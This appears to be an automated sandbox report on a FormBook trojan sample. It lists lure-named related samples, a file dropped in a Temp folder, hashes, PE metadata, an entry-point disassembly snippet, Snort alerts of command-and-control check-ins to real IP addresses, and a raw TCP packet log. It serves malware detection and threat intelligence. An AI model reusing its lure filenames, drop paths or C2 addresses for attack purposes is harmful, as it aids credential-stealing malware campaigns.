	LBJiq1QBaH.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	Statement of Account.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	art-1881052385.xls	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	184285013-044310-sanlccjavap0003-7069_pdf (5).exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	DOC 10132021.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	WIRE ADVICE.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	WireCopy.html	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	UGS2021100716241.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	WireCopy.html	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	Rust_hack_v6.4.2_x64_stable.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	0810202 import Inquiry ref- November order 2021.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	5.945342837977056
Encrypted:	false
SSDEEP:	1536:tWD8iCOQRnNBM9rJvWMyWiWjkulM6AnhmXDLZBD:tW4iCOING9rAMy+M6KYB
MD5:	FB70FF484021669624233D0FBD77EC6A
SHA1:	6820B13631967663EC2637C43C828468633051FD
SHA-256:	2B40757A6763AA725D86426CE3CD16FCF1380A9152837D4FBE5E5B085710054C
SHA-512:	57BCAC78A12191DF511DBB96F6D494096B56F269C3D009F373993574FF529698239BCC886DCC10EF162EF0C1D9AC0A4C6008813DC88BECF4DB8C700C35C0F47E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L....&.Q.................P...0......x........`....@.........................................................................4[..(....p......................................................................0... .......4............................text....O.......P.................. ..`.data........`.......`..............@....rsrc........p... ...p..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8384034474405602
Encrypted:	false
SSDEEP:	48:13WB14fxcKzsIYICVEq8MX0D0HSFlNUK6lGNxGt7KLk8s8LKvUf9KVyJ7hU:J2CdCn8MZyFlulGNxGt7KLyeymw
MD5:	3486408AF6E5BFDBE15DEDDEFB834576
SHA1:	8118E27D74977C176BD305862105CE5F22AE10D8
SHA-256:	5B26EE9B1FF774148D102BD7594D4B31C4B004D05C42F72EF82B1C90362B2196
SHA-512:	E2F45693DDBE1A42C6855439A394E1C00AE8EC81FDC4B8F1BC6EC37E93AE9389D0E0CCC3C4419572DD09371590384E859324F163BDFD462C2B1D4FF7F7ED1E73
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms Download File
Process:	C:\Windows\explorer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	modified
Size (bytes):	7168
Entropy (8bit):	4.293554016975187
Encrypted:	false
SSDEEP:	48:rnP8TJ+SyD98AASGufBedrCSKum13ncSCuZ0IdNdOVZ/JGuadR9F/dBdOvoSSuiR:gT0R9QEBedGJ1M7/odR3TRX
MD5:	3E816923BA81E5D113C621EEFCB70865
SHA1:	1165F3E591D7CA9897E0FA80A7B844FA1EC04BD5
SHA-256:	6C79FF6FD49A2EF5A0955EE4BD31D3FCD69D609CAD733355751045E84E55FF9B
SHA-512:	4D442AE400C4A5355DF4F3CE1DA0432A33BCF86EA5B2D401E37D71FA1B540C3D70D4E14924CD3D8B66140E027E69C5F8515F679AE47D09D7673B8EA93F1B15C4
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.945342837977056
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	REQUIREMENT.exe
File size:	102400
MD5:	fb70ff484021669624233d0fbd77ec6a
SHA1:	6820b13631967663ec2637c43c828468633051fd
SHA256:	2b40757a6763aa725d86426ce3cd16fcf1380a9152837d4fbe5e5b085710054c
SHA512:	57bcac78a12191df511dbb96f6d494096b56f269c3d009f373993574ff529698239bcc886dcc10ef162ef0c1d9ac0a4c6008813dc88becf4db8c700c35c0f47e
SSDEEP:	1536:tWD8iCOQRnNBM9rJvWMyWiWjkulM6AnhmXDLZBD:tW4iCOING9rAMy+M6KYB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....&.Q.................P...0......x........`....@........

File Icon


Icon Hash:	69e1c892f664c884

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x51B926D4 [Thu Jun 13 01:56:36 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	669316531b5190f02843878b6ed87394

Entrypoint Preview

Instruction
push 00410DDCh
call 00007F3288D3DE05h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx-04h], bh
js 00007F3288D3DE3Dh
std
test byte ptr [ebp+559B9F4Eh], bl
out 8Eh, al
mov ds, word ptr [00000000h]
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebx
inc ecx
inc esi
push esp
push ebx
push eax
dec esi
inc esp
dec ecx
dec esi
inc edi
inc ebp
dec esi
push ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
cmp byte ptr [edx-25h], ch
movsb
dec ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15b34	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x1cb2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x134	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14fe8	0x15000	False	0.514962332589	data	6.38314027792	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0xd0c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x1cb2	0x2000	False	0.348388671875	data	3.76635467806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x189b4	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors	English	United States
CUSTOM	0x180f6	0x8be	MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel	English	United States
CUSTOM	0x17df8	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
RT_ICON	0x17550	0x8a8	data
RT_GROUP_ICON	0x1753c	0x14	data
RT_VERSION	0x171a0	0x39c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collides Systems, Inc.
InternalName	Stablerne
FileVersion	4.00
CompanyName	Collides Systems, Inc.
LegalTrademarks	Collides Systems, Inc.
Comments	Collides Systems, Inc.
ProductName	Collides Systems, Inc.
ProductVersion	4.00
FileDescription	Collides Systems, Inc.
OriginalFilename	Stablerne.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-15:48:15.815475	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.11.20	51.77.52.109
10/13/21-15:48:15.815475	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.11.20	51.77.52.109
10/13/21-15:48:15.815475	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.11.20	51.77.52.109
10/13/21-15:48:26.950542	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.11.20	172.67.139.41
10/13/21-15:48:26.950542	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.11.20	172.67.139.41
10/13/21-15:48:26.950542	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.11.20	172.67.139.41
10/13/21-15:48:32.017186	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	34.102.136.180
10/13/21-15:48:32.017186	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	34.102.136.180
10/13/21-15:48:32.017186	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	34.102.136.180
10/13/21-15:48:32.123902	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49796	34.102.136.180	192.168.11.20
10/13/21-15:49:11.731408	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49803	34.102.136.180	192.168.11.20
10/13/21-15:49:28.012270	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	216.189.108.75
10/13/21-15:49:28.012270	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	216.189.108.75
10/13/21-15:49:28.012270	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	216.189.108.75
10/13/21-15:49:40.986035	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
10/13/21-15:49:51.480106	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49807	80	192.168.11.20	15.197.150.5
10/13/21-15:49:51.480106	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49807	80	192.168.11.20	15.197.150.5
10/13/21-15:49:51.480106	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49807	80	192.168.11.20	15.197.150.5
10/13/21-15:49:56.865542	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.11.20	198.54.117.211
10/13/21-15:49:56.865542	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.11.20	198.54.117.211
10/13/21-15:49:56.865542	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.11.20	198.54.117.211
10/13/21-15:50:02.084648	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49809	80	192.168.11.20	142.250.186.179
10/13/21-15:50:02.084648	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49809	80	192.168.11.20	142.250.186.179
10/13/21-15:50:02.084648	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49809	80	192.168.11.20	142.250.186.179
10/13/21-15:50:07.575224	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49810	75.2.115.196	192.168.11.20
10/13/21-15:50:44.881393	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49816	34.102.136.180	192.168.11.20
10/13/21-15:51:09.550588	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	216.189.108.75
10/13/21-15:51:09.550588	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	216.189.108.75
10/13/21-15:51:09.550588	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	216.189.108.75
10/13/21-15:51:22.215039	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
10/13/21-15:51:40.937059	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
10/13/21-15:52:48.959781	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.11.20	172.67.139.41
10/13/21-15:52:48.959781	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.11.20	172.67.139.41
10/13/21-15:52:48.959781	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49841	80	192.168.11.20	172.67.139.41
10/13/21-15:52:54.173382	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49843	75.2.115.196	192.168.11.20
10/13/21-15:53:16.219924	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49851	34.102.136.180	192.168.11.20
10/13/21-15:53:36.200521	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49858	80	192.168.11.20	216.189.108.75
10/13/21-15:53:36.200521	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49858	80	192.168.11.20	216.189.108.75
10/13/21-15:53:36.200521	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49858	80	192.168.11.20	216.189.108.75
10/13/21-15:54:11.217942	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
10/13/21-15:54:15.522927	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
10/13/21-15:54:30.056496	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49863	80	192.168.11.20	137.117.17.70
10/13/21-15:54:30.056496	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49863	80	192.168.11.20	137.117.17.70
10/13/21-15:54:30.056496	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49863	80	192.168.11.20	137.117.17.70
10/13/21-15:54:35.279756	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49864	80	192.168.11.20	192.0.78.25
10/13/21-15:54:35.279756	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49864	80	192.168.11.20	192.0.78.25
10/13/21-15:54:35.279756	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49864	80	192.168.11.20	192.0.78.25
10/13/21-15:54:46.424484	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 15:47:08.597446918 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.597521067 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.597775936 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.617135048 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.617196083 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.672358990 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.672499895 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.672524929 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.672729015 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.674860954 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.675101042 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.789300919 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.789364100 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.790081978 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:08.790240049 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.793445110 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:08.833942890 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:09.201791048 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:09.201951027 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:09.202152967 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:09.202217102 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:09.202243090 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:09.202651978 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:09.208338022 CEST	49790	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:47:09.208398104 CEST	443	49790	172.217.168.46	192.168.11.20
Oct 13, 2021 15:47:09.286861897 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.286890984 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.287105083 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.287486076 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.287508011 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.324157953 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.324306965 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.324453115 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.324909925 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.325289011 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.328768969 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.328907013 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.329138041 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.329417944 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.369901896 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.554373026 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.554620981 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.554677010 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.554708004 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.554858923 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.555367947 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.555634022 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.556813002 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.556972980 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.557008028 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.557033062 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.557218075 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.557472944 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.557630062 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.557666063 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.557813883 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.564825058 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.564996004 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.565040112 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.565191031 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.565283060 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.565325975 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.565336943 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.565493107 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.565577030 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.565732002 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.565767050 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.565973997 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.566421986 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.566586018 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.566632986 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.566795111 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.567047119 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.567207098 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.567246914 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.567390919 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.567747116 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.567907095 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.567951918 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.568213940 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.568476915 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.568634033 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.568670988 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.568949938 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.569214106 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.569372892 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.569412947 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.569669008 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.569986105 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.570147038 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.570187092 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.570348024 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.570553064 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.570730925 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.570765972 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.570956945 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.571012020 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.571216106 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.571484089 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.571633101 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.571686983 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.571846962 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.571877003 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.571990013 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.572015047 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.572033882 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.572262049 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.572746992 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.572921991 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.572962999 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.573153019 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.573208094 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.573415041 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.573702097 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.573878050 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.573910952 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.574059963 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.574083090 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.574229956 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.575352907 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.575484037 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.575520039 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.575544119 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.575634003 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.575711966 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.575719118 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.575738907 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.575922012 CEST	49791	443	192.168.11.20	142.250.185.161
Oct 13, 2021 15:47:09.575949907 CEST	443	49791	142.250.185.161	192.168.11.20
Oct 13, 2021 15:47:09.576123953 CEST	49791	443	192.168.11.20	142.250.185.161
